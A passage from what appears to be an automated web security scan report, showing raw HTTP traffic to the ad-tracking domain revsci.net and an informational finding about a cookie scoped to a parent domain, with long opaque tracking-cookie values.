NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_evMS="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudMGnLg9gqT3HEe3XM9OR5om4StALLEl9sEMwvnCoBpIccfVs6urDw05fHt6PfSqbiWNXR/jCjVKUWrTvUIbcsKagvwG10PsbYIMpsXG1ZYgPGTNKk4xnTkFyZxw+3FBOTrvF5jks9+JkzB/hR0Tkd4oX42bdny92IEJPNNLWe4yV1PTfZSRvnppCJRLCL2ohVJyVYoEVPVkJW78T5TlLreZ2H8/nAR4ctiOctGhaXEazbuzgI0h4pAHsKQIW1G4X4wUVUG5pLlBZNsLTGLu1ilset+uOhC1jNfafldX2PUk1bqmDkVtoM/Skeh91IHEnyyzjkJS7wz6UGgDFsf7IMHHlhGaJ8LrLZ6vygejeyfId1Qcu1uBIBwl6vqu9zmYAgdZ7z8fM3lHostCyPZMFO3BCJ32NO4epSB3BWTkLnwwbQHIDzRUyBRsVAvco8x/LaLOqIFa5vxRY/FjbTt6EZbR+Chh+3x1rS10fzv0zBCcorVoYeH/aQm3ow62YSuwYfMDfZ1RhABUQTnVtlmce15Rxsn2OCBUh+6toejr4T2cDhLXZC69XGDU0PpetZVISrXJ4APF9qsWT77F4wLT4zo6cpo7nRrXpTeNNVU6qfYojwNmWL9eawbGrcVupb3kxWdodWQHy7NTvvw5wjTnXvtmyup8hmB9BqRRtQAS4O4Il259CpV4eRoLgpYo1P2qbzL2sJNgl/Ot5L7tBx3D/soQ1JxEIy613DpS1O0fsKZsW3icNUN/FW+NvfQOaBo5LjzHNy48hySDs+mrPzGCKpsVAq5cgqjYZhN4F52CzNb+3x3nvRkya1M9stHfQus7Ru3jtmyYNgGNMa1V68/dVtrCpITqbV7HHbjLHvlABV/WvRb2OSaMJ4MAbP9aKDdOFQbjOlSbxpRBnqsjyF0Rn9ZCHS2SMk3OFlJ627v6e/JX6rs8tRij7XeS1DvJYIOUyRCiDcaOr2NOlABeK5Qs9V1xN2Xbl9utsOZzninCy5NtTZjxkXDwJxXGvEdjxayqUPD/pJ9NK6E1dup/apyccF5E3TidzG4q/8bqos250kNmw1xYaJumj9mEqR4YSYnBANPhk+VzZcgjK0LcWf9TTLIfUjZB/p9sg5tH9jbnJmAD10ujoXfkvn0NUUoIDNzKtEcKq6SfjwwKgPxKFsvWtmBBij5xKGVtai3hvbxu+VPAob5D0mC23kZJhmgvS+JZO1Nlby9ytNQ8Nq1NIEHqsouw3MXa+LQwlVvk69Z3FAp1Urw5cq0R8Zzx1iEHDUQW2XLL+KtE4gzDXpUs43F/KzmwLcWNUld85lLv+Zs4+2SFI38K/UChrS/uhsXQ"; rsi_us_1000000="pUMV4ymnMBYY7dXKYa4+QIxDgvM/u/LBmb+24q2tXApJiFT0/ChXTUHNBmbDd46t2hFxDCMVaHP4CLq/pZMuoy/ewcD0FX/sKZKTRO7VZ6iPmAiSltSt2s1xurZiR6H24UqyA+Nh2RxjsZeCiFKkk80FLO19B2NlUVN7jrYLH0NcEDW/dc9rzfg7YbyYtEmGqNoKYa5yINjN6e64XwCx4D46jpq6oGI1IZqA3DT3sEnoRJjrPK5azHeuT4nS5vioYImIWn6v3MgSK/RzrDRuAJ9j91dfPNrNfMwdtaDxsR4w4lhnkcahqc2S0BIsn/oyUca/oeTJoQYbwJLsCkiNcMLywz7ZEwnFltdeQOuk1ywxzFOjbg6cfyoxSipYtVjffF7qgITHxcUPT68KNERXMGy+sRKFMQLmeTrdopWZ+1obDjU9/BEAlmJJDLfStO73D27JrDXhrV74uzGERS6h+diijLK75rsaUimseoXwgkl9f4+GeEKI+oEsL4cD/Er0Jg2xRn0TDMY/6HNdLWgdbMF0OTvjnpUeokDF6xcBZRb6ZkGzKTyP9KKrv9f4nmLcxgiwCcguTfu9whhbnlGGiH8sG0kXhP7cBJQprkfqHWxAV5/VukNuzc51qmMzHTKgS0vAwiMvaOSBzvr+LsGh0q5cCKXNbFxLpkQnCitO5j+EBFKWHBE1dbS3z/CiiumJtsDuLFny+6XTFHQx9un0UaEF3Hi4Cn6ZOHY5/DKYyrighviQF7pnMxn0AW0HC6YBeE0Z+48oX+gYVyfMi63VXQoke8h/7W2zU2vN6hMbuhSi/obO8bhOUxNgbfkz+vZwXvf6pPxDaZNxsBR+Clwg4vzXg+Uujg2VkfE1QOkdxCKQUvJiX8Gn5CEfkWDFAyIDkIvHrqZtMNrhyNcl98LTb346dAwOwysbzdoh72IBwFnMAeLBhOWXvCSQNlCmlGDNsOfLen2jioPuq5L0lOONkfTqB/g/KK5rR+9cfyZCtpaiCmMSdDpgHdUuCdCXBN/omF6OdlPGYeUcOLEAaquHaGPrTWpbOQ0HGtSP7yfNv0XvGDw6ajlb0l+l8bB/mvXv2SILU062vN9JU++IWvixYNTL9RUomOVux4EU2cJ2sLFszBVubsN1kPUduNKVVw2X0a6dXuhq4qoUW11T6Kyb7dO4m1AbBRrItbPKZi3KdVnQWKicY3QreXyXa7A9NQcvUkbOkE65wOLek+qqT0HDiWaheBzY+dX+jb12QkG3eyrMWDkxFEbzHnXSi+/DhGtr36p4KTjfKGl9Bs1WgN42NWJ2FniUaeyiDvYXQ8ypkErggFNtDtcnjbPQ+h83ld+1XqRT3lTbbXfEOEy39JI3wIVsCxJesH7MFrKtOMDpJXBianiJYXm1MLpOAYQ5M9mK/9rfnhk0VY+Qf8s7QPXBFje+NPjRkGFrocHy4UDzXaW2+2hBDvcOrnJbsgcUe4i/oLDVcOpsxsmW8IS6OMYRkwPdmYgGL5YfRYEKjMsUbmy67Gc2dTg7Y9LTFVnADWyRnzAezIS+NW7wqLkXh4/OzXH9QQWqikfI6wpW9rOG7+vUd3Qoia1crbjTt+gSk2hvt+cVWSF2Fl3akOyZIZyuHBxrsClCfQgStQQmEiNaOXo9zDpzde90duK+NvVriCbGPj9EE7hhcxkgghiN6pIJ6OXaxkG/bXonImQXovRVDCk4kzDJ9VGH3cSj9+1zz8ZP32r48sxAhklxuKayLxCyMX8gmEZ+aHvMTkGDrKSD7FwzFnHyGJpXP1jJgrDSHoeaAkoAFW2UGq5hVOeJ"; rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJC32dXLnKG/pV+zq2jLxL9x1pNHcD2ocpIiv/mxMD/xw6JhTycr5wS4UUa4TNPNDPv1QWh8gkmOOsH9rraddoccklFuNdzYOTGbveI5B67GeW6vLj+wWQEAWvERBw6jjPQ4L4Uubk0NaY9wI2qrKXBEJqalRFyzz++kuS0t8FA35bmxx0VW/Jj5TEabtOAJFHV+aNKdWI3SWQJ9jz0Bw9jAtbfMu/qQH+JwD1NWyRhr+2kr+wlN2b1z5lAdiCkUa0tKYvCvYcqJvNr2DqBzL0LgZXnZiFpr9375ifqe1pBlZ259HXaBJ50bcPs5W6UrbuxwwykkmBfvTGdhY6R36hDP9GcRo3IMQKLboYAZUAD6b705sfN2AyaDbgmLf3ZERjZTjw5bBLQ9fbKsIhBlYFUM4XFud47GCjJTwGuwc1LM95tG5AFzx9tnwsgvVNaovbwq2L9N/YKANEQv8X2qIyy+X6kp2cftNCti8OnGgKDOj8KjUySG9pekHu4As1aZJIbEGxWjO+KA6xjX9kaVSObtWvl8I9hp4IH7INgoU0uq+mPXynexYaV+bmSiifClg+RGshM2vhG0UyUpJ0UynUzma61vniue1+wkfmg3et6cr2sqzQSRUj1pHr2rWAZQJDaflpCOk=; rtc_AhSj=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; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rsB4rOfq5QsJKQ25ayViGymJW18v6oxo5TQQ/CGgK6H8il2W9fxKJhTycj5xS4V0a4TNPNDPv1QWh8gkmOOsH9rraddoccklFmNdAYOTGYvtIJB6bP4P6/Il+5XrH+SP65GfIkcTktT+ixZsRa1DGnHu9HmUsTwsj+b4TSHPCO16C5RAiiAQYMQkaugeRM6rM/rSpP7RG7CFImDEIo+ZBxqIBIeZ+v3cM8F6iRLQzaH1DXQZr18dGmrbf+V7QUoiZ0gWnenJxJJMyQWZ0z/uI+KrnzxNnfHDxF+JCvmJDRN+8iExCSVxXVcEuEzVns7DeeHbBmOE8SRm++crK0omvqP/CfGX/DbBUxp1a3nt6JIJOhMBXHohM3DmzPoKuWuptd0Ma4U3S/mvJMjNaGZ+h2R3rHVICpO0sF6nd/LPqsbK3vOkk8FWqANAReKveX6vv424aoESBdu1mR6KA7WmNW+Zwj+rJJvKXOPsWdBzMbj02qJxZnLSwD3C5ODnISsuK0Rw1af7v3s2u6sHlE3HiAdJp/GqcuQhOyTW3qYudZXum8EjHSamUCkFqdy9wcuvk6ZamKiglqUheua638AObL0rMRx+eowSq/lw9vb3yh++2J+axlFbzsjJbwrS90p1UmzQuU47NxiHAg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:22:21 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 11:22:20 GMT
Content-Length: 941

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
var rsinetsegs=['G07608_10004','G07608_10009','G07608_10016','G07608_10017','G07608_10001'];
var rsicsl="lDlIlPlQlA";
var rsiExp=new Date((new Date(
...[SNIP]...

10.121. http://pix04.revsci.net/I10985/b3/0/3/1008211/111571878.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/111571878.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EmhOQMMpzaxu2F29/z4eoxYqCQLwKIREfXDY7ViGzONef0liDtqNncA2iFgL2LcmTUz/xw+ppzybAZxKwWQY0UUnQiG5kFQmZoeI+2ZBSjkw/QKBeEE1xCXKzbX6BtHZFDnD6taOUzkZssC9SmHYB9KeGG/XzENTIKkCoUUZ4/wp7/xZIJqCDRJxxA47nJB9Xwz2W1oW7yZVEh7y/CXlCsjZg2b1BrZ/rYVa7IulGT084e0l4n30SghEbDXoaJXhjriypIHg/FEMsakEZ21tqC1IR0TAJE8L3JOhIxn+HciQF2mHnVgpdKWhwjQw5LGokyTcjv/ole3kAgyg01uv0UTvZOVMEDmiWOqkH0nGkrdVNsS8f8urLmG1UX1hCiOaB1ffI2tchDu+MOABggAS4Em/QKFAMR40MgzBcQCyEyLT5Icxv9GNAvG0EEkjiWmCmzx8iEvQMNNobKY86AmxfF0Vkky+sy3xtb5ziRTXOPO8h2SM8u/GqRdNOa6JTPKG786KGVIr3UPetLR+8KjuUaUzDj3mfgF9zcggYMGL4e8jDJ+77LnuApfS5T251pJOp39UNYld2V4pabM31sBTeYPU3jQSGJN/7Cv1D1ppac7z0ux+12aq36lBvZiDAqONmiLOgpLAIgPmP/9FGpoCg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:51:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/111571878.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjv